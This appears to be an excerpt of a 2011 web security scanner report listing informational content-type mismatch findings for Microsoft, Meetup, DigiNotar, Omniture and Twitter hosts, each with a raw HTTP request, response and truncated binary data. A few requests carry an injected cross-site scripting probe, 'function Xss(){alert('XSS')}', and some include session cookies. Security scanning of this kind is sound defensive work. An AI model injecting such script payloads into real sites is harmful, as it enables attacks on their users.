X-Cache-Info: cached

...... ..........&...........h.......(... ...@........................................j-..l0..k/..i,..j,..`...^...j...f(...L...r...q...Y..g*..i-...f...y...........X..i,......................j...k....
...[SNIP]...

27.18. http://microsoftcambridge.com/slideshow/Vertigo.small.xap previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://microsoftcambridge.com
Path:	/slideshow/Vertigo.small.xap

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /slideshow/Vertigo.small.xap HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=A3C0DAFD2501960491DB6D8BB4AF78CD; .ASPXANONYMOUS=RwXpWsygzAEkAAAANDBmYzBmNzItYTVjZi00ZjUxLTlhMWEtODkxYzlhOWM2NDQ40; language=en-US; X-Mapping-pfddgonl=29291CB50178807E04EE211C8DF8D85B

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Sat, 03 Sep 2011 13:08:12 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Last-Modified: Mon, 06 Jul 2009 20:22:40 GMT
Content-Length: 134194

PK.........}.:Q.s^7..........AppManifest.xaml...`.I.%&/m.{J.J..t...`.$..@.........iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?".....|.4_..."_...E.l>.h...Gw.6.y.......US...i..;-.jzwog
...[SNIP]...

27.19. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /visitor/v200/svrGP.aspx?pps=70&siteid=892&ref=http://www.omniture.com/en/%23%0Afunction%20Xss(){alert(%27XSS%27)%3B}&ms=935 HTTP/1.1
Host: now.eloqua.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: ELOQUA=GUID=19DDB6AE1941431A910441006951B164; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Sat, 03 Sep 2011 14:43:36 GMT
Content-Length: 86

function GetElqCustomerGUID(){ return '19ddb6ae-1941-431a-9104-41006951b164'; }

27.20. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://omnituremarketing.tt.omtrdc.net
Path:	/m2/omnituremarketing/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=2&profile.geo_continent_code=6&profile.geo_area_code=214&profile.tnt_customer=false&profile.customer_status=prospect&profile.language=en&mbox=omniTargetingInfo&mboxId=1&mboxTime=1315043065914&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 98
Date: Sat, 03 Sep 2011 14:43:48 GMT
Server: Test & Target

mboxFactories.get('default').get('omniTargetingInfo',1).setOffer(new mboxOfferDefault()).loaded();

27.21. https://onlineaanvraag.diginotar.nl/DigiForms/images/buttons/English/Annuleren.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://onlineaanvraag.diginotar.nl
Path:	/DigiForms/images/buttons/English/Annuleren.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /DigiForms/images/buttons/English/Annuleren.png HTTP/1.1
Host: onlineaanvraag.diginotar.nl
Connection: keep-alive
Referer: https://onlineaanvraag.diginotar.nl/Digiforms/FormDesigner.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=vxf1nkmhlaurworuh4lsmves

Response

HTTP/1.1 200 OK
Content-Length: 2127
Content-Type: image/png
Last-Modified: Fri, 06 May 2011 07:40:46 GMT
Accept-Ranges: bytes
ETag: "05324e9c0bcc1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 17:37:17 GMT

......JFIF.....`.`......Ducky.......d.....C.................................... . ..
...

...... ...........C.........................................................................v.."...........
...[SNIP]...

27.22. https://onlineaanvraag.diginotar.nl/DigiForms/images/buttons/English/Volgende.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://onlineaanvraag.diginotar.nl
Path:	/DigiForms/images/buttons/English/Volgende.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /DigiForms/images/buttons/English/Volgende.png HTTP/1.1
Host: onlineaanvraag.diginotar.nl
Connection: keep-alive
Referer: https://onlineaanvraag.diginotar.nl/Digiforms/FormDesigner.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=vxf1nkmhlaurworuh4lsmves

Response

HTTP/1.1 200 OK
Content-Length: 1935
Content-Type: image/png
Last-Modified: Fri, 06 May 2011 07:40:46 GMT
Accept-Ranges: bytes
ETag: "05324e9c0bcc1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 17:37:17 GMT

......JFIF.....`.`......Ducky.......d.....C.................................... . ..
...

...... ...........C.........................................................................v.."...........
...[SNIP]...

27.23. https://onlineaanvraag.diginotar.nl/DigiForms/images/buttons/English/Vorige.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://onlineaanvraag.diginotar.nl
Path:	/DigiForms/images/buttons/English/Vorige.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /DigiForms/images/buttons/English/Vorige.png HTTP/1.1
Host: onlineaanvraag.diginotar.nl
Connection: keep-alive
Referer: https://onlineaanvraag.diginotar.nl/Digiforms/FormDesigner.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=vxf1nkmhlaurworuh4lsmves

Response

HTTP/1.1 200 OK
Content-Length: 2162
Content-Type: image/png
Last-Modified: Fri, 06 May 2011 07:40:46 GMT
Accept-Ranges: bytes
ETag: "05324e9c0bcc1:12fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 17:37:43 GMT

......JFIF.....`.`......Ducky.......d.....C.................................... . ..
...

...... ...........C.........................................................................t.."...........
...[SNIP]...

27.24. http://photos1.meetupstatic.com/photos/event/2/8/a/0/thumb_22990400.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://photos1.meetupstatic.com
Path:	/photos/event/2/8/a/0/thumb_22990400.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /photos/event/2/8/a/0/thumb_22990400.jpeg HTTP/1.1
Host: photos1.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 1281
Cache-Control: max-age=23593280
Expires: Sat, 02 Jun 2012 14:52:56 GMT
Date: Sat, 03 Sep 2011 13:11:36 GMT
Connection: close

GIF89aP...........{.....{.....................!.s!!!!!.!!.).c).k))))).)).11111.11.9.Z9.k99999.B.RBBBBB.BB.BB.J.RJJJJJ.RRRRR.RR.ZZZZZ.ZZ.ccccc.cc.k.9k.Bkkkkk.kk.s.9sssss.ss.{{{{{.{{...)..............).
...[SNIP]...

27.25. http://photos1.meetupstatic.com/photos/event/a/0/9/5/highres_9821109.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://photos1.meetupstatic.com
Path:	/photos/event/a/0/9/5/highres_9821109.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/event/a/0/9/5/highres_9821109.jpeg HTTP/1.1
Host: photos1.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 2786
Cache-Control: max-age=5893522
Expires: Thu, 10 Nov 2011 18:17:48 GMT
Date: Sat, 03 Sep 2011 13:12:26 GMT
Connection: close

.PNG
.
...IHDR...0...0.....W.......bKGD............. pHYs...H...H.F.k>... vpAg...0...0....W..
mIDATh...kl]WV.{.s.~...N..q.V..Ni..R..y.#Z..*f..F. .@H..$..)B.!.....@BB..fDU...yAGm3i.&..$.c...b....{.
...[SNIP]...

27.26. http://photos1.meetupstatic.com/photos/member/3/2/3/0/thumb_11052848.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://photos1.meetupstatic.com
Path:	/photos/member/3/2/3/0/thumb_11052848.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/member/3/2/3/0/thumb_11052848.jpeg HTTP/1.1
Host: photos1.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 9447
Cache-Control: max-age=30346305
Expires: Sun, 19 Aug 2012 18:43:26 GMT
Date: Sat, 03 Sep 2011 13:11:41 GMT
Connection: close

.PNG
.
...IHDR...N...P.....8.......gAMA......a.... pHYs..........(J.... vpAg...N...P..;.A..$tIDATx.}.[.%.u...W.........{zn.\4.J&..b........,.t@.2..A"XH..%. `...y...$@.#Fb .....,..M(.X.(....4.H+#..zz
...[SNIP]...

27.27. http://photos2.meetupstatic.com/photos/event/9/1/d/e/thumb_10177342.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://photos2.meetupstatic.com
Path:	/photos/event/9/1/d/e/thumb_10177342.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/event/9/1/d/e/thumb_10177342.jpeg HTTP/1.1
Host: photos2.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 2449
Cache-Control: max-age=13441484
Expires: Mon, 06 Feb 2012 02:56:20 GMT
Date: Sat, 03 Sep 2011 13:11:36 GMT
Connection: close

.PNG
.
...IHDR...P...2.....DO......iCCPicc..x...Mk.Q...I.U..`]. ..DI&...i.Jl.c...n:.I.h2.g&.... ...E.+M.*.. ."hu......H...L.R.x..s......B..b.....m3fJ,W.........8......,...G...'..h]..[._.....r...
...[SNIP]...

27.28. http://photos2.meetupstatic.com/photos/event/a/1/9/a/highres_9821370.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://photos2.meetupstatic.com
Path:	/photos/event/a/1/9/a/highres_9821370.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/event/a/1/9/a/highres_9821370.jpeg HTTP/1.1
Host: photos2.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 3498
Cache-Control: max-age=13436702
Expires: Mon, 06 Feb 2012 01:37:28 GMT
Date: Sat, 03 Sep 2011 13:12:26 GMT
Connection: close

.PNG
.
...IHDR...0...0.....W.......bKGD............. pHYs...H...H.F.k>... vpAg...0...0....W..5IDATh...k...y..}..............\.&.R...P..JMS.JT...j?P..R.6*Q?..U[%U../I.$H%.*..`...............\.s.s.
...[SNIP]...

27.29. http://photos2.meetupstatic.com/photos/member/7/6/d/8/thumb_1590424.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://photos2.meetupstatic.com
Path:	/photos/member/7/6/d/8/thumb_1590424.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /photos/member/7/6/d/8/thumb_1590424.jpeg HTTP/1.1
Host: photos2.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 2252
Cache-Control: max-age=6156223
Expires: Sun, 13 Nov 2011 19:15:51 GMT
Date: Sat, 03 Sep 2011 13:12:08 GMT
Connection: close

GIF89aP............)))kkk{{{............cZZB99......cBBB))sBBR...kc.JB....kc.B1B......kc.B1......R911...R9).....cB1scZ....sRsJ1B)..kRR1..kB.sB...!....k.B...Z..ccB.sJ..k!....{)ZB...c.k9.c!.k...c..R..9.
...[SNIP]...

27.30. http://photos2.meetupstatic.com/photos/member/a/e/2/9/thumb_9884585.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://photos2.meetupstatic.com
Path:	/photos/member/a/e/2/9/thumb_9884585.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/member/a/e/2/9/thumb_9884585.jpeg HTTP/1.1
Host: photos2.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 3764
Cache-Control: max-age=13440790
Expires: Mon, 06 Feb 2012 02:44:51 GMT
Date: Sat, 03 Sep 2011 13:11:41 GMT
Connection: close

.PNG
.
...IHDR...P...P............ cHRM..z%..............u0...`..:....o._.F....bKGD............. pHYs...#...#.x.?v... vpAg...P...P.........IDATx...{.]W..?...y.Gnn.pk.N.q.i0F..H.....`.-.
..ZAE".[....
...[SNIP]...

27.31. http://photos3.meetupstatic.com/photos/event/a/0/9/4/highres_9821108.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://photos3.meetupstatic.com
Path:	/photos/event/a/0/9/4/highres_9821108.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/event/a/0/9/4/highres_9821108.jpeg HTTP/1.1
Host: photos3.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 2224
Cache-Control: max-age=6146735
Expires: Sun, 13 Nov 2011 16:38:01 GMT
Date: Sat, 03 Sep 2011 13:12:26 GMT
Connection: close

.PNG
.
...IHDR...0...0.....W.......bKGD............. pHYs...H...H.F.k>... vpAg...0...0....W...;IDATh...[.]........9.[&..hn$..."T[)Z..b.PK...`.."...J.K_,.&m.^(B).`.Z...ZQ.I..L.8.k.d.g.......>39..Dms
...[SNIP]...

27.32. http://photos3.meetupstatic.com/photos/member/1/3/0/f/thumb_11344879.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://photos3.meetupstatic.com
Path:	/photos/member/1/3/0/f/thumb_11344879.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/member/1/3/0/f/thumb_11344879.jpeg HTTP/1.1
Host: photos3.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 10987
Cache-Control: max-age=13493874
Expires: Mon, 06 Feb 2012 17:30:03 GMT
Date: Sat, 03 Sep 2011 13:12:09 GMT
Connection: close

.PNG
.
...IHDR...5...P.......=.....bKGD............. pHYs...H...H.F.k>... vpAg...5...P...vC..*vIDATx.U.y.^.y..;...}.[{Cwc. ..Iq.I.Z...5v,...K..I.;.....JR5$.GJR5.Y....k.8.\..$k.,..h-.$K$......F..o..
...[SNIP]...

27.33. http://photos3.meetupstatic.com/photos/member/1/d/6/1/thumb_18127521.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://photos3.meetupstatic.com
Path:	/photos/member/1/d/6/1/thumb_18127521.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/member/1/d/6/1/thumb_18127521.jpeg HTTP/1.1
Host: photos3.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 10128
Cache-Control: max-age=30194288
Expires: Sat, 18 Aug 2012 00:29:44 GMT
Date: Sat, 03 Sep 2011 13:11:36 GMT
Connection: close

.PNG
.
...IHDR...O...P............ pHYs................ vpAg...O...P.QgX...'-IDATx.....%Ir%v......M1fddUfUf.,.. .i6{..P(\p..;..1.a....n. J.D.fdefdFD..o...........j@(.........=...jjG........._.J.BB
...[SNIP]...

27.34. http://photos3.meetupstatic.com/photos/member/7/e/a/1/thumb_12752417.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://photos3.meetupstatic.com
Path:	/photos/member/7/e/a/1/thumb_12752417.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/member/7/e/a/1/thumb_12752417.jpeg HTTP/1.1
Host: photos3.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 11578
Cache-Control: max-age=24046226
Expires: Thu, 07 Jun 2012 20:42:06 GMT
Date: Sat, 03 Sep 2011 13:11:40 GMT
Connection: close

.PNG
.
...IHDR...P...5......(lD....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD............. pHYs..........o.d... vpAg...P...5..mwH..,|IDATx.].y.eY]..Y...t..s...y...
...[SNIP]...

27.35. http://photos4.meetupstatic.com/photos/event/a/0/9/6/highres_9821110.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://photos4.meetupstatic.com
Path:	/photos/event/a/0/9/6/highres_9821110.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/event/a/0/9/6/highres_9821110.jpeg HTTP/1.1
Host: photos4.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 2080
Cache-Control: max-age=13436680
Expires: Mon, 06 Feb 2012 01:37:06 GMT
Date: Sat, 03 Sep 2011 13:12:26 GMT
Connection: close

.PNG
.
...IHDR...0...0.....W.......bKGD............. pHYs...H...H.F.k>... vpAg...0...0....W....IDATh...KlT.....;3w._.A...b.U.:. ...4-...HU.....,..]4.H.t.M.MU..*.P...M..P"E%e....0/C,.45...?...8..f.p
...[SNIP]...

27.36. http://photos4.meetupstatic.com/photos/member/2/7/2/f/thumb_20650031.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://photos4.meetupstatic.com
Path:	/photos/member/2/7/2/f/thumb_20650031.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/member/2/7/2/f/thumb_20650031.jpeg HTTP/1.1
Host: photos4.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 1377
Cache-Control: max-age=28798863
Expires: Wed, 01 Aug 2012 20:52:43 GMT
Date: Sat, 03 Sep 2011 13:11:40 GMT
Connection: close

.PNG
.
...IHDR...0...0.....W.......bKGD............. pHYs.........g..R... vpAg...0...0....W....IDATh....o.E..?...R.@ $*.z.).....z..U.Z..8.7p.VN...pk..84..J...G..
.@..5}$q....~.wwf8..:.7".i.R..J..}..
...[SNIP]...

27.37. http://research.microsoft.com/en-us/um/people/helenw/papers/fullMashupOS.pptx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://research.microsoft.com
Path:	/en-us/um/people/helenw/papers/fullMashupOS.pptx

Issue detail

The response contains the following Content-type statement:

Content-Type: application/vnd.openxmlformats-officedocument.presentationml.presentation

The response states that it contains XML. However, it actually appears to contain unrecognised content.

Request

Response

27.38. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/plas07.pptx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/ppt/plas07.pptx

Issue detail

The response contains the following Content-type statement:

Content-Type: application/vnd.openxmlformats-officedocument.presentationml.presentation

The response states that it contains XML. However, it actually appears to contain unrecognised content.

Request

Response

27.39. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/w2sp10.pptx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://research.microsoft.com
Path:	/en-us/um/people/livshits/papers/ppt/w2sp10.pptx

Issue detail

The response contains the following Content-type statement:

Content-Type: application/vnd.openxmlformats-officedocument.presentationml.presentation

The response states that it contains XML. However, it actually appears to contain unrecognised content.

Request

Response

27.40. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://scripts.omniture.com
Path:	/global/scripts/targeting/dyn_prop.php

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

27.41. http://search.twitter.com/search.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://search.twitter.com
Path:	/search.json

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json;charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /search.json?q=%23NERDWHM&rpp=3 HTTP/1.1
Host: search.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:28:25 GMT
Server: hi
Cache-Control: max-age=15, must-revalidate, max-age=300
Expires: Sat, 03 Sep 2011 13:33:25 GMT
Content-Type: application/json;charset=utf-8
Content-Length: 238
Vary: Accept-Encoding
X-Varnish: 1309418588
Age: 0
Via: 1.1 varnish
Connection: close

